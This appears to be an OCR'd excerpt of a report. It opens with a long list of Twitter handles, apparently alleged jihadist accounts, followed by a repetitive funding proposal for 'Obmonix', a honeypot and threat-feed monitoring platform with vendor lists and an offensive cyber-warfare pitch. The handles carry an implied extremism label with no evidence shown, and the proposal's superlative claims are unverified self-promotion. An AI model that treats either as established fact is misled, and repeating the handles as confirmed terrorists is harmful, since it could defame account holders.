• https://twitter.com/Sdy23326287 

• https://twitter.com/TrdfhYtggg 

• https://twitter.com/aawwss_22 

• https://twitter.com/88ibramz 




• https://twitter.com/auwtwg 

• https://twitter.com/Dawla Baqyia 

• https://twitter.com/erherll 

• https://twitter.com/Bdjdjdl6 

• https://twitter.com/alaminhajinubua 

• https://twitter.com/dtdet2 

• https://twitter.com/abu albelgiki 

• https://twitter.com/akhi J2 

• https://twitter.com/jjbgcff 

• https://twitter.com/hgf8273 

• https://twitter.com/mhteegl37 

• https://twitter.com/SawfaNamdzi 

• https://twitter.com/khilafa01 

• https://twitter.com/Karib Alsham 

• https://twitter.com/nnlllgfd 

• https://twitter.com/alshamiabdallal 

• https://twitter.com/ghareeb 001 

• https://twitter.com/samaka _26 

• https://twitter.com/AgeOfKhilafah 

• https://twitter.com/Rehamis58 




• https://twitter.com/sarahl9anbar 

• https://twitter.com/OussamaBagdad 

• https://twitter.com/AnsarAISharial3 

• https://twitter.eom/0_8 

• https://twitter.com/SaefAzdl4 
182 

• https://twitter.com/lbnElwalid4 

• https://twitter.com/SeifMarkl6 

• https://twitter.com/Ahlu __Sunnah 

• https://twitter.com/ridaibnwalid 

• https://twitter.com/nabilbgari 

• https://twitter.com/ _abdulmatin _ 

• https://twitter.com/rabel3anbar 

• https://twitter.com/arab _ellsajinne 

• https://twitter.com/abo _A _M _E _R 

• https://twitter.com/Leathiraq88 

• https://twitter.com/abomoathl437 

• https://twitter.com/Ade superriadi 

• https://twitter.com/samirahijazil 

• https://twitter.com/a090322228 




• https://twitter.com/afadlll 

• https://twitter.com/cmmffl 

• https://twitter.com/BahrainiAgaml 

• https://twitter.com/vip_salami 

• https://twitter.com/deppalotaipi04 

• https://twitter.com/Aomar771 

• https://twitter.com/CitizenArkhab 

• https://twitter.com/Q8__tk 

• https://twitter.com/parl284 

• https://twitter.com/pcl3simpanan 

• https://twitter.com/5antithogut 

• https://twitter.eom/Y XXXIV 

• https://twitter.com/Ara3i _Ebl98 

• https://twitter.com/Q0220Q 

• https://twitter.com/Harth615 

• https://twitter.com/Buibrahiml2 __04 

• https://twitter.com/im _here 
183 

• https://twitter.com/Ultrasmusliml 

• https://twitter.com/7eccba5cf36840e 




• https://twitter.com/twinl943 

• https://twitter.com/VOCON9S12321232 

• https://twitter.com/asyiya _04 

• https://twitter.com/AbangFal 

• https://twitter.com/SadekPasent 

• https://twitter.com/solyia _S 

• https://twitter.com/ghzhjll 

• https://twitter.com/HuChuin _63 

• https://twitter.com/NeightMid 

• https://twitter.com/alhareth0770 

• https://twitter.com/CqlXfdwac 

• https://twitter.com/Daesh _NewsS 

• https://twitter.com/hg5599 

• https://twitter.com/xbeel2 

• https://twitter.com/welll55951 

• https://twitter.com/T7__n3w 

• https://twitter.com/year2022end 

• https://twitter.com/th _akrh 

• https://twitter.com/bladi _00alaslam 

• https://twitter.com/ettaboy3 




• https://twitter.com/wefet_37 

• https://twitter.com/NeightMid 

• https://twitter.com/anasjpumkl 

• https://twitter.com/AheheHaw 

• https://twitter.com/mo895 _mo 

• https://twitter.com/baqiya80 

• https://twitter.com/isis_3366 

• https://twitter.com/al _wafaal083 

• https://twitter.com/e55isisa 
184 

• https://twitter.com/Sahkr_k 

• https://twitter.eom/i Jiill 

• https://twitter.com/Dhhd4874 

• https://twitter.com/ibn _al _khattb 

• https://twitter.com/Hmdani__t 

• https://twitter.com/ao55206 

• https://twitter.com/Cxch2 

• https://twitter.com/jhjhjee_lk 

• https://twitter.com/ShamCenterlNFO 

• https://twitter.com/islam_net2 




• https://twitter.com/dawla_tnt 

• https://twitter.com/moshawkani 

• https://twitter.com/cc erreer 

• https://twitter.com/combattantdivin 

• https://twitter.com/Amirbakistani3 

• https://twitter.com/ebu _nusra 

• https://twitter.com/mabed _5 

• https://twitter.com/Ablul _Vahhab 

• https://twitter.com/dareyya32 

• https://twitter.com/Hilafet _Haber 

• https://twitter.com/yahyakurdiOO 

• https://twitter.com/Ablul _Vahhab 

• https://twitter.com/dareyya32 

• https://twitter.com/kudusungelini 

• https://twitter.com/hpLmnX6tvw2F2mN 

• https://twitter.com/hpLmnX6tvw2F2mN 

• https://twitter.com/turmeda000313 

• https://twitter.com/AbuDharlslandi7 

• https://twitter.com/K_H_034 

• https://twitter.com/56a37f7197ba41c 




• https://twitter.com/anjemchoudary 
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• https://twitter.com/ben7491 

• https://twitter.com/Raqqa _SL 

• https://twitter.com/qwerwoow 

• https://twitter.com/lEINusral 

• https://twitter.com/SomQaeda 

• https://twitter.com/SomQaeda 

• https://twitter.com/is5 _is5 

• https://twitter.com/sarokhsam25 

• https://twitter.com/taher3832 

• https://twitter.com/beeshbeeshbees3 

• https://twitter.com/aljanady75 

• https://twitter.com/_Mi_Sk_ 

• https://twitter.com/AbuDharlslandi7 

• https://twitter.com/iislamicl2 

• https://twitter.com/soman611 

• https://twitter.com/zFrBNMgOhJGCOcz 

• https://twitter.com/zxyor09 

• https://twitter.com/iulwiz9Scbm90 




• https://twitter.com/y8J8_ 

• https://twitter.com/abo _hagar44 

• https://twitter.com/gharebbOO 

• https://twitter.com/ab0khalidl3 

• https://twitter.com/Aomar771 

• https://twitter.com/ississjs 

• https://twitter.com/mo895 _mo 

• https://twitter.com/solyia _S 

• https://twitter.com/isis_3366 

• https://twitter.com/Migrant2Allah 

• https://twitter.com/G6A77 

• https://twitter.com/achbahlaill0075 

• https://twitter.com/reem _153 _ 
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• https://twitter.com/zFrBNMgOhJGCOcz 

• https://twitter.com/sh33445555 

• https://twitter.com/Alethawiya44 

• https://twitter.com/As_soumaly 

• https://twitter.com/nor92331 

• https://twitter.com/islamdamasl980 




• https://twitter.com/HA _alshami03 

• https://twitter.com/jundi71033868 

• https://twitter.com/zzzzzxl75 

• https://twitter.com/azdisis58 

• https://twitter.com/tckfnfml 

• https://twitter.com/AstCils71 

• https://twitter.com/Muwaxxid/following 

• https://twitter.com/champl007469284 

• https://twitter.com/abo_lllali 

• https://twitter.com/CbbjVnnj 

• https://twitter.com/yw217 

• https://twitter.com/umm _yasmine 

• https://twitter.com/czlbCfZOMnyubOd 

• https://twitter.com/muahied _8 

• https://twitter.com/AlnjlatMohamad 

• https://twitter.com/iplee4 

• https://twitter.com/isis_3344 

• https://twitter.com/nor964432 

• https://twitter.com/Turbo_113 

• https://twitter.com/ivfkfj2 




• https://twitter.com/Clh9ML 

• https://twitter.com/157aboismail 

• https://twitter.com/cmdmmxl 

• https://twitter.com/RxdctfvDtfhj 

• https://twitter.com/zhranylOO 
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• https://twitter.com/kalldd345 

• https://twitter.com/invasion44 

• https://twitter.com/26anneza3 

• https://twitter.com/Gareeeb45 

• https://twitter.com/baqya520 

• https://twitter.com/fbdfberberber 

• https://twitter.com/treraqqa 

• https://twitter.com/talwtalbghdadyl 

• https://twitter.eom/M _m _m _m _2000 

• https://twitter.com/alsloulistupid 

• https://twitter.com/Aleeeiiii4444 

• https://twitter.com/MatarMurad 

• https://twitter.com/GMC_IS 

• https://twitter.com/Diteslavrit4 




https://twitter.com/abou _walaal2 

https://twitter.com/LLAA554 

https://twitter.com/safeallah425 

https://twitter.com/kinght78ag 

https://twitter.com/Bdjdjdl6 

https://twitter.com/lk_32 _state 

https://twitter.com/hjfkdsll 

https://twitter.com/Om _0said 63 

https://twitter.com/kurdish22 _22 

https://twitter.com/AzdiSayil 

https://twitter.com/ahmedx360xl8 

https://twitter.com/HuChuin _63 

https://twitter.com/parisonourfire 

https://twitter.com/20Trewq 

https://twitter.com/gkgjfufjc 

https://twitter.com/humaninnocence 

https://twitter.com/monaserl56 
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• https://twitter.com/muriidil2 

• https://twitter.com/poompaiii 




• https://twitter.com/muslim_13_ 

• https://twitter.com/ahmadkhloofll5 

• https://twitter.com/Masl24an 

• https://twitter.com/ahmedmahmoudil2 

• https://twitter.com/dfghujuiytrr 

• https://twitter.com/mejedklm 

• https://twitter.com/f73071755 

• https://twitter.com/rkrk4m26 

• https://twitter.com/dyalla72 

• https://twitter.com/sa7awetbuslim04 

• https://twitter.com/TP57iQ3ICAGgKzV 

• https://twitter.com/mohammedsz6 

• https://twitter.com/1993Agmadl993 

• https://twitter.com/Bbsswwnn 

• https://twitter.com/almnasron4 

• https://twitter.com/bar_bell 

• https://twitter.com/ManguAilon55 

• https://twitter.com/modie_50 

• https://twitter.com/Njd_qt78is 

• https://twitter.com/Gehaaadll22 




• https://twitter.com/bladi _00alaslam 

• https://twitter.com/fallujhal 

• https://twitter.com/AboFareed 10 

• https://twitter.com/manerland 

• https://twitter.com/abo _a _94 

• https://twitter.com/3Abouwalid 

• https://twitter.com/bakreebeeko _5 

• https://twitter.com/3lill87 

• https://twitter.com/Alnablsy97 
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• https://twitter.com/G6A77 

• https://twitter.com/The0bserver91 

• https://twitter.com/6cccg2 

• https://twitter.com/ISIS _HER01 

• https://twitter.com/ZZzBXqHOymuBANK 

• https://twitter.com/teamsystemdz 

• https://twitter.com/vbhgxdfc 

• https://twitter.com/bhCotn 

• https://twitter.com/maktaba _1 

• https://twitter.com/osama daml 




• https://twitter.com/fata _almosel 

• https://twitter.com/xxmm4455777 

• https://twitter.com/abujalaall 

• https://twitter.com/Waseemalsaudi 

• https://twitter.com/Khlifa27al2 

• https://twitter.com/AbidaGina 

• https://twitter.com/Ansar _DawlalO 

• https://twitter.com/yesteyesic4 

• https://twitter.com/lieffejongen 

• https://twitter.com/MohammedAtta22 

• https://twitter.com/Ticaal90 

• https://twitter.com/ANAdenalSomali 

• https://twitter.com/ns45678 

• https://twitter.com/AbouShahadeh 

• https://twitter.com/jihadil0744139 

• https://twitter.com/abohamzaalturki 

• https://twitter.com/JoniManm 

• https://twitter.com/omarl985741 

• https://twitter.com/see00012 

• https://twitter.com/almuhajerBackup 




• https://twitter.com/sadking23 
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• https://twitter.com/qwttplly 

• https://twitter.com/k42isisa 

• https://twitter.com/dhxhsvd2 

• https://twitter.com/77nb_ 

• https://twitter.com/dawlajokers 

• https://twitter.com/monaser0017 

• https://twitter.com/dawlawialg671 

• https://twitter.com/fahadeyad62 

• https://twitter.com/btr333btr4 

• https://twitter.com/vrjevvel 

• https://twitter.com/Hhdhdgl 

• https://twitter.com/GF98LKI 

• https://twitter.com/dola24687 

• https://twitter.com/Talal _Q30 

• https://twitter.com/muslimmouwahed8 

• https://twitter.com/8itismesalman 

• https://twitter.com/kubuiman03v 

• https://twitter.com/jihadiuser58 




• https://twitter.com/PARRIS_951 

• https://twitter.com/isis_1144 

• https://twitter.com/SyariahlSlight8 

• https://twitter.com/meek_don 

• https://twitter.com/yotorg 

• https://twitter.com/facebookaccoun2 

• https://twitter.com/nseem066 

• https://twitter.com/AnsarAd98 

• https://twitter.com/ieshabaqea 

• https://twitter.com/batist550 

• https://twitter.com/aassddffa833 

• https://twitter.com/madridi4good 

• https://twitter.com/nor92331 
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• https://twitter.com/lEINusral 

• https://twitter.eom/j Jj Jjj _5577 

• https://twitter.com/strange566 


Detailed Project Funding Stages Information 




The initial stage of the project will consist of the selective and timely purchase of all the necessary appliances, including the timely localization and successful acquisition of fake Web site honeypot solutions and the active acquisition of network assets for the purpose of successful honeypot solution placement.

• The main objective of the initial phase would be to acquire all the necessary equipment for the purpose of setting up the foundations for the Obmonix platform. The equipment will be acquired in a timely fashion, largely relying on a selected set of proprietary industry-leading contacts.

• The main objective of the next phase would be to ensure that the equipment is placed in a secure location and is properly maintained, so that the operator is capable of operating the Obmonix platform in a secure way.

• The main objective of the next phase would be to establish the foundations of the world's largest data set of intelligence data, so that the Obmonix platform is capable of processing and intercepting the necessary data.

• The main objective of the next phase would be to acquire the necessary proprietary service-based solutions that would empower the operator with the necessary tools to process and intercept data.

• The main objective of the next phase would be to process and intercept the world's largest data set of cybercrime and cyber jihad data.

Sample Cyber Jihad Forums: 

Detailed Project Funding Phase Information 




01. The initial stage of the project will consist of the selective and timely purchase of all the necessary appliances, including the timely localization and successful acquisition of fake Web site honeypot solutions and the active acquisition of network assets for the purpose of successful honeypot solution placement.

• Associated deliverables will include access to proprietary technology and the ability to associate long-term tasks, including the ability to set the foundation for the Obmonix platform and its eventual commercialization, further enhancing the operator's ability to continue providing the Intelligence Community with the necessary data to proactively respond to a growing set of cybercrime and cyber-jihad activity by malicious nation-states and malicious actors globally.

02. The next stage will consist of active placement of the required equipment in a secure location, including putting active security measures in place to ensure that the Obmonix operator continues to work in a secure location, including the premises.

• Associated deliverables will include a secure workplace, including the ability to empower the operator with the necessary data to perform various operator activities, ensuring global presence for Intelligence Community members and the security industry.



03. The next stage will consist of the purchase of access to active spam, phishing and malware feeds, including successfully geolocated placement within specific regions of interest, including but not limited to Algeria, Argentina, Bahrain, Bolivia, Brazil, Burkina Faso, Chile, China, Colombia, Cyprus, Ecuador, Guatemala, Jordan, Democratic People's Republic of Korea, Liberia, Macao, Maldives, Moldova, Republic of Nauru, Niger, Pakistan, Poland, Romania, Sierra Leone, Sudan, Syrian Arab Republic, Togo, Uganda, Vanuatu, Yemen.

• Associated deliverables will include access to the world's largest portfolio of threat intelligence data, including access to real-time data, empowering the operator with the necessary data to perform operator activity.

04. The next stage will include the active acquisition of service-based localization and acquisition solutions, leading to a successful set of data to be processed and collected by the sensor.

• Associated deliverables will include access to proprietary technology empowering the operator with the necessary data to perform the operator activity, including real-time monitoring of the world's largest and most comprehensive sensor-network-based cybercrime and cyber-jihad platform.

05. The next phase will include active data acquisition from the Intelligence Community's leading intelligence gathering platform in the form of active data placement, including the establishment of an active threat-intelligence-gathering, portal-based platform.

• Associated deliverables will include the world's largest data set of cybercrime and cyber jihad activity in a sensor-type platform, eventually leading the Obmonix platform to reach a commercialization stage, further enhancing the Intelligence Community's and the security industry's mission.

Detailed Project Cost Proposal Information 

The initial stage of the project will consist of the selective and timely purchase of all the necessary appliances, including the timely localization and successful acquisition of fake Web site honeypot solutions and the active acquisition of network assets for the purpose of successful honeypot solution placement.


• FortiMail

Key points:

• The appliance is capable of processing millions of emails on a daily basis.

• The appliance is capable of maintaining a list of thousands of fake emails, allowing additional attribution and potentially expanding the capabilities of the appliance to include additional custom-made spam origin sources.

• The appliance is capable of delivering actionable intelligence on millions of spam origin sources for Iran, Pakistan, Saudi Arabia, Iraq and Syria on a daily basis.

• The appliance is capable of delivering detailed information leading to the production of actionable intelligence for Iran, Pakistan, Saudi Arabia, Iraq and Syria on a daily basis.

The FortiMail appliance would ensure the active acquisition of spam for the purpose of establishing the foundations for a successful research, monitoring and analysis system allowing the systematic, real-time and automated acquisition of malicious software, phishing and social engineering.

• Blue Coat Malware Analysis

Key points:

• The appliance is capable of processing thousands of malware samples on a daily basis.

• The appliance is capable of maintaining detailed information, processed and delivered in an automated fashion, for malicious sources originating in Iran, Pakistan, Saudi Arabia, Iraq and Syria.

• The appliance is capable of interacting with Web links found in malicious spam emails for the purpose of establishing the foundations for successful monitoring of malicious software, phishing and social engineering originating from Iran, Pakistan, Saudi Arabia, Iraq and Syria, including the automated processing of and interaction with mobile malware.

• The appliance is capable of maintaining detailed information leading to the production of quality, real-time, actionable intelligence reports on malicious software, phishing and social engineering origin sources for Iran, Pakistan, Saudi Arabia, Iraq and Syria.

The Blue Coat Malware Analysis would ensure the automated and real-time acquisition of malicious software, phishing and social engineering data for research and analysis, for the purpose of ensuring the active and real-time acquisition of malicious software, phishing and social engineering research activity originating in these sources.

• Vormetric encryption appliance

Key points:

• The encryption appliance would ensure the real-time storage of the research and analysis data, ensuring the availability, confidentiality and integrity of the data for the purpose of producing actionable, real-time, intelligence-based research and analysis reports.

• The encryption appliance would ensure the active real-time storage of the actionable, real-time delivered research and analysis data, allowing the research report data to be processed and analyzed in an efficient, systematic and automated way.

The encryption appliance would ensure that the platform operator is properly empowered with the necessary data, techniques and technologies to properly act upon, analyze and respond to cybercrime and cyber jihad events globally.


• Barracuda Web Application appliance

Key points:

• The Web application appliance would allow the automated secure use of the robot system, allowing systematic real-time data acquisition on various jihadist sources.

• The Web application appliance would ensure the automated and efficient use of the robot in a secure fashion, allowing the production of real-time actionable intelligence and of research and analysis data.

The Web application appliance would ensure that the operator is properly empowered with the necessary data, techniques and technologies to properly act upon, analyze and respond to cybercrime and cyber jihad events globally.

• Checkpoint DDoS Protector

Key points:

• The appliance is capable of preventing exposure of the network assets utilized by the network, potentially resulting in the exposure of the availability, confidentiality and integrity of the information.

• The appliance is capable of ensuring the real-time, automated and persistent availability, integrity and confidentiality of the information.

The Checkpoint DDoS Protector would ensure the constant availability of the network infrastructure utilized in this project, potentially preventing compromise of the network assets and resulting in improved productivity and realization of various project objectives.

• Encryption appliance

Key points:

• The encryption appliance is capable of ensuring the confidentiality, integrity and availability of the information.

• The encryption appliance is capable of distinguishing between multiple networks, further ensuring a closed type of network access.

The encryption appliance would ensure that the maximum possible security measures are in place, further ensuring that access to the closed restricted network remains as private as possible and ensuring the confidentiality, integrity and availability of the information, to further ensure the active, real-time, intelligence-based research and analysis data.

• Cisco Catalyst

Key points:

• The appliance is capable of ensuring the real-time and automated use of the network equipment necessary to maintain the active infrastructure, to ensure that it's operating in an automated and efficient fashion.

Cisco Catalyst is network equipment allowing efficient, productive interconnection between all the platforms and network equipment used in this project.

• Kapow appliance

Key points:

• The appliance is capable of processing hundreds of thousands of Web sites on a daily basis, ensuring the automated processing and analysis of jihadist communities and allowing the automation of the monitoring process to further enhance the produced actionable intelligence, leading to research and analysis data.

• The appliance is capable of monitoring and establishing the foundations for real-time monitoring and analysis of jihadist communities for the purpose of producing actionable, real-time intelligence research and analysis data.

• The appliance is capable of processing multiple jihadist forum communities for the purpose of establishing the foundations for successful, real-time, actionable intelligence-producing research and analysis data.

The analysis appliance would ensure timely and real-time access to current and historical intelligence data in regard to jihadist activities online, through the systematic, automated and real-time data acquisition from a variety of public and closed sources, for the purpose of setting up the foundations for a successful data source leading to successful analysis and research activities.

• Appliance router

Key points:

• The appliance router would ensure the constant and real-time availability of the network assets for the purpose of active and timely acquisition of actionable, real-time research and analysis reports.

The purpose of the appliance router would be to ensure real-time connectivity with a variety of platforms, to ensure that the operator is properly empowered with the necessary data, techniques and technologies to properly act upon, analyze and respond to cybercrime and cyber jihad events globally.

• Analytics appliance

Key points:

• The analytics appliance would be capable of performing real-time assessment of cybercrime and cyber jihad events globally and will ultimately empower the Obmonix platform operator with the necessary data, information and knowledge to act upon, prevent and respond to cybercrime and cyber jihad events globally.

The purpose of the appliance would be to empower the operator with the necessary data, information and knowledge to act upon, react to and respond to various cybercrime and cyber jihad events globally.

• Rosette appliance

Key points:

• The localization appliance will ultimately empower the
Obmonix platform operator with the necessary data, information
and knowledge to act upon, respond to and prevent widespread
damage while analyzing cybercrime and cyber jihad events
globally.

The purpose of the localization appliance would be to empower
the Obmonix platform operator with the necessary data,
information and knowledge to act upon, respond to and prevent
widespread damage provoked by cybercrime and cyber jihad events
globally.

• Systran appliance

Key points:

• The Systran appliance will ultimately empower the operator
with the necessary data, information and knowledge to act upon,
respond to and prevent widespread damage while analyzing
cybercrime and cyber jihad events globally.

The purpose of the Systran appliance would be to empower the
Obmonix platform operator with the necessary data, information
and knowledge to act upon, respond to and prevent widespread
damage provoked by cybercrime and cyber jihad events globally.

Funding Phase

The initial funding phase will consist of active acquisition of
assets for the purpose of obtaining access to industry leading
and proprietary selected providers of threat intelligence for
the purpose of establishing the foundations for an active
sensors network type of cybercrime/cyber jihad monitor sensor
network type of data. The initial stage will consist of
obtaining assets for the purpose of obtaining access to
industry leading and proprietary selected equipment for the
purpose of setting the foundations for a successful sensor
network based type of data.

The initial phase will consist of active purchase of the
following equipment: FortiSandbox, Blue Coat Malware Analysis,
NAS Storage, Cisco Firewall, pfSense, Cisco Catalyst, Vormetric
encryption appliance, including the following
subscription-based type of threat intelligence gathering data -
Team Cymru threat data feed, Kaspersky threat data feed, Abusix
threat data feed, MalwarePatrol threat data feed, Sophos threat
data feed, OPSWAT, Abusix Threat Feed, ProjectHoneypot threat
data feed.


- Kaspersky Data Feed
- Sophos Data Feed
- Team Cymru Data Feed
- MalwarePatrol Data Feed
- Abusix Data Feed
- LookingGlass Data Feed
- Cyren Data Feed
- Symantec Data Feed
- VirusTotal Data Feed
- ProjectHoneypot Data Feed

The second funding phase will consist of active acquisition of
honeypot appliance including active netblock purchase within a
dedicated set of countries for the purpose of establishing the
foundations of an active sensor network type of
data-acquisition activities. The second funding phase will
consist of active acquisition of the following proprietary
appliances: Honeybox Enterprise, Honeybox SCADA, including
netblocks within the following countries,

The third funding phase will consist of active purchase of
service and solution-based appliance, including data-processing
appliance, including localization appliance, for the purpose of
setting up the foundations for the Obmonix platform
successfully empowering its operator with the necessary data
and expertise for the purpose of actively responding to global
cybercrime and jihad events.

The third funding phase will consist of active purchase of the
following appliances: Kapow Software, Rosette appliance,
Systran appliance, Sentinel appliance, Palantir appliance.

The fourth funding phase will consist of active purchase of the
World's most popular solution-oriented portal for Information
Security - Expedited Entry Into the Cyber Warfare Realm - a
Pro-U.S Based Offensive and Asymmetric Cyber Warfare Practical
Trends Application Big Data and Research-Centered R&D Platform -
further ensuring successful and ongoing commercialization
including the active acquisition of client-base, including the
establishing of the World's largest endpoint based sensor
network for tracking and responding to cybercrime and jihad
events globally.

Dancho Danchev will build a pro-U.S offensive and asymmetric
cyber warfare program that will inevitably dive deep into the
Cyber Warfare realm and will produce what can be best described
as the U.S primary source for offensive and asymmetric cyber
warfare information repository and data-information on current
and future trends and provide the foundations for a successful
R&D cyber warfare partnership with millions of loyal
Pro-Western cyber warriors and researchers globally positioning
the platform as the leading think-tank for practical and
relevant cyber warfare power including the World's leading
Pro-Western Cyber Warfare Research and Development research
program center.

With the U.S attempting to tackle the country's perceived and
outdated misunderstanding of Cyber Warfare in today's modern
Russia, China and Iran dominated Cyber Warfare Realm, including
the ongoing shortage of recruitment and relatively outdated and
not necessarily dynamic HR-management pool of hundreds of
thousands of Pro-U.S Cyber Warriors, the platform will
ultimately re-position the U.S as the dominant Cyber Warfare
power by providing actionable think-tank type of proactive and
actionable Cyber Warfare insight including the active and
permanent recruitment of millions of Pro-U.S Cyber Warriors
further supporting the U.S's mission on its way to dominate and
launch offensive and defensive cyber missions and related
research attacks.

The project will conduct what can be best described as the most
comprehensive study and analysis of the United States' outdated
understanding of the Cyber Warfare realm and provide actionable
and practical insight including a production-ready
HR-management and Big Data driven Cyber Warfare platform
successfully disrupting international cybercrime networks
conducting economic terrorism, infiltrating the vibrant
cyber-crime and cyber jihad international community and
successfully recruiting millions of Pro-U.S Cyber Warriors. The
First Stage of the project would ensure that the foundations
for a successful invite-only Pro-U.S Cyber Warfare community
have already been established through the direct launching and
operation of the World's Largest and Proprietary Invite-Only
Pro-U.S Cyber Warfare Forum Community.

Associated deliverables will include: the World's largest
search engine for security information, the World's most
vibrant community for security job search, the World's most
vibrant proprietary community for sharing, disseminating,
communicating and enriching security data, the World's most
comprehensive sensor network for observing, disseminating and
responding to global cybercrime-events, the release of
community-enriched security router, the successful release of
community-enriched privacy router, the development and release
of community-enriched public threat feed, the release of
community-enriched private threat feed, including proprietary
threat feed, targeted threat intelligence on demand type of
research and analysis producing solution, proprietary bug
bounty solution, hacking and security-oriented online radio,
hacking and security-oriented E-zine, hacking and
security-oriented videocast, on-demand penetration testing and
offensive team consulting, on-demand Web site monitoring for
security events, OEM partnership capabilities, custom-built
anti-virus scanner capabilities.

Community Industry Reference

The contractor Dancho Danchev is an internationally recognized
cybercrime researcher, security blogger and threat intelligence
analyst in the field of cybercrime research having successfully
contributed to the overall demise of cybercrime internationally
throughout the past decade having successfully pioneered a
variety of threat intelligence gathering methodologies leading
him to a successful pursuit of high-profile nation-state actors
and malicious adversaries across the globe. The researcher
successfully launched a startup named Disruptive Individuals
aiming to disrupt and undermine the international cybercrime
and cyber-jihad ecosystem globally.

Statement of Work (SOW)

01. Vendor contact - the initial stage of the project will
consist of direct contact between industry leading commercial
security appliance providers further requesting pricing and
shipping details including a "point-of-contact".

• Possible deliverables consisting of the initial stage include
industry-leading security appliance - FortiMail, Blue Coat
Malware Analysis, FortiSandbox, Vormetric encryption appliance,
Barracuda Web Application appliance, Checkpoint DDoS Protector,
Ethernet encryptor, Cisco Catalyst, Kapow appliance, Palantir
appliance, Cisco firewall appliance, Rosette appliance, Systran
appliance, NAS appliance, pfSense appliance, Honeybox
appliance, Honeybox SCADA appliance.

02. Vendor netblock contact - the initial stage of the project
will consist of direct contact between industry leading
providers of netblock requesting pricing information for
specific pre-defined geolocated regions of interest.

• Possible deliverables including netblock in Algeria,
Argentina, Bahrain, Bolivia, Brazil, Burkina Faso, Chile,
China, Colombia, Cyprus, Ecuador, Guatemala, Jordan, Democratic
People's Republic of Korea, Liberia, Macao, Maldives, Moldova,
Republic of Nauru, Niger, Pakistan, Poland, Romania, Sierra
Leone, Sudan, Syrian Arab Republic, Togo, Uganda, Vanuatu,
Yemen.

03. Vendor threat data contact - the initial stage of the
project will consist of direct contact between industry-leading
including a selected set of threat data providers requesting
pricing information including possible partnership opportunity.

• Possible deliverables including Team Cymru threat data feed,
Kaspersky threat data feed, Abusix threat data feed,
MalwarePatrol threat data feed, Sophos threat data feed,
OPSWAT, Abusix Threat Feed, ProjectHoneypot threat data feed.

04. Secure location foundation - the initial stage of the
project will consist of direct evaluation of the infrastructure
required for the secure location including direct contact
between security vendors to ensure a secure location.

• Possible deliverables include military-grade fence,
surveillance, security guard.

05. Vendor connection contact - the initial stage of the
project will consist of direct contact between vendor to ensure
that the infrastructure is properly secured ensuring a timely
and secure infrastructure.

• Possible deliverables include direct connection.

06. Secure work environment - the initial stage of the project
will consist of direct evaluation including a direct purchase
of a work terminal to ensure a smooth and secure work
environment.

• Possible deliverables including RF shielding, SEL SP-157,
FSPK-10, SEL SP-113 "Blockade".

07. Secure work environment - the initial stage of the project
will consist of direct evaluation including a direct purchase
of equipment related to secure work environment to ensure a
smooth and secure work environment.

• Possible deliverables including Cisco Firepower ASA,
Checkpoint Threat appliance, Nova network appliance, Fortinet
security appliance, Dell Soho network, security appliance.

The contractor Dancho Danchev is one of the world's leading
experts in the field of cybercrime research and threat
intelligence gathering having successfully tracked, monitored
and profiled high-profile nation-state and malicious actors
type of fraudulent activity over the past decade having
successfully pioneered and established a direct connection with
some of the world's leading providers of threat intelligence
gathering.

The contractor's initial goal for the purpose of the Obmonix
platform would be to achieve the world's largest and most
comprehensive sensor type of network for monitoring, profiling
and keeping track of nation-state malicious-actors type of
fraudulent and malicious activity.

The project main base would be located in a discreet location
in Sofia, Bulgaria. The contractor would eventually ensure that
active RF shielding including basic physical security measures
are taken in place including active surveillance,
military-grade fence and an associated security guard are in
place for the purpose of establishing the foundation of a
secure work environment.

The Obmonix platform aims to build the World's most versatile
and comprehensive sensor network for intercepting, monitoring
and responding to cybercrime and cyber jihad events
successfully deploying a variety of proprietary sensor network
based of honeypot appliances, industry-wide partnership
including the utilization of proprietary cybercrime and cyber
jihad forum and community monitoring and infiltration campaigns
successfully positioning the platform as the leading indicator
for cybercrime and cyber jihad activity globally.



Cost Proposal - Detailed Project Information

01. Equipment cost - The Obmonix platform will ultimately rely
on the following equipment cost for the purpose of establishing
the foundations for the Obmonix platform.

• FortiMail
• FortiSandbox
• Blue Coat Malware Analysis
• Vormetric encryption appliance
• Checkpoint DDoS Protector
• Encryption appliance
• Cisco Catalyst
• Kapow appliance
• Appliance router
• Analytics appliance
• Infoblox Trinzic 1420
• Nova network security
• Cisco firewall appliance
• IllusionBlack Framework
• Rosette appliance
• Systran appliance
• NAS appliance
• pfSense
• Honeybox appliance
• Honeybox SCADA appliance
• Network equipment

Detailed Project Funding Phase Information

01. The initial funding phase will consist of active
acquisition of assets for the purpose of obtaining access to
industry leading and proprietary selected providers of threat
intelligence for the purpose of establishing the foundations
for an active sensors network type of cybercrime/cyber jihad
monitor sensor network type of data. The initial stage will
consist of obtaining assets for the purpose of obtaining access
to industry leading and proprietary selected equipment for the
purpose of setting the foundations for a successful sensor
network based type of data.

• The initial phase will consist of active purchase of the
following equipment: FortiSandbox, Blue Coat Malware Analysis,
NAS Storage, Cisco Firewall, pfSense, Cisco Catalyst, Vormetric
encryption appliance, including the following
subscription-based type of threat intelligence gathering data -
Team Cymru threat data feed, Kaspersky threat data feed, Abusix
threat data feed, MalwarePatrol threat data feed, Sophos threat
data feed, OPSWAT, Abusix Threat Feed, ProjectHoneypot threat
data feed.

Including the following Threat Feeds:

• Kaspersky Data Feed
• Sophos Data Feed
• Jigsaw Threat Data Feed
• IBM X-Force Exchange
• Team Cymru Data Feed
• Proofpoint Threat Feed
• NetSTAR Data Feed
• RiskIQ Data Feed
• ESET Data Feed
• Pixalate Data Feed
• MalwarePatrol Data Feed
• Abusix Data Feed
• Massive Data Feed
• PhishLabs Data Feed
• LookingGlass Data Feed
• Blueliv Data Feed
• Mnemonic Data Feed
• Cyren Data Feed
• ADMINUSLabs Data Feed
• NSFOCUS Data Feed
• Webroot Data Feed
• Symantec Data Feed
• VirusTotal Data Feed
• ProjectHoneypot Data Feed

02. The second funding phase will consist of active acquisition
of honeypot appliance including active netblock purchase within
a dedicated set of countries for the purpose of establishing
the foundations of an active sensor network type of
data-acquisition activities.

• The second funding phase will consist of active acquisition
of the following proprietary appliances: Honeybox Enterprise,
Infoblox Trinzic 1420, Honeybox SCADA, including netblocks
within a dedicated set of countries - Algeria, Argentina,
Bahrain, Bolivia, Brazil, Burkina Faso, Chile, China, Colombia,
Cyprus, Ecuador, Guatemala, Jordan, Democratic People's
Republic of Korea, Liberia, Macao, Maldives, Moldova, Republic
of Nauru, Niger, Pakistan, Poland, Romania, Sierra Leone,
Sudan, Syrian Arab Republic, Togo, Uganda, Vanuatu, Yemen.

03. The third funding phase will consist of active purchase of
service and solution-based appliance, including data-processing
appliance, including localization appliance, for the purpose of
setting up the foundations for the Obmonix platform
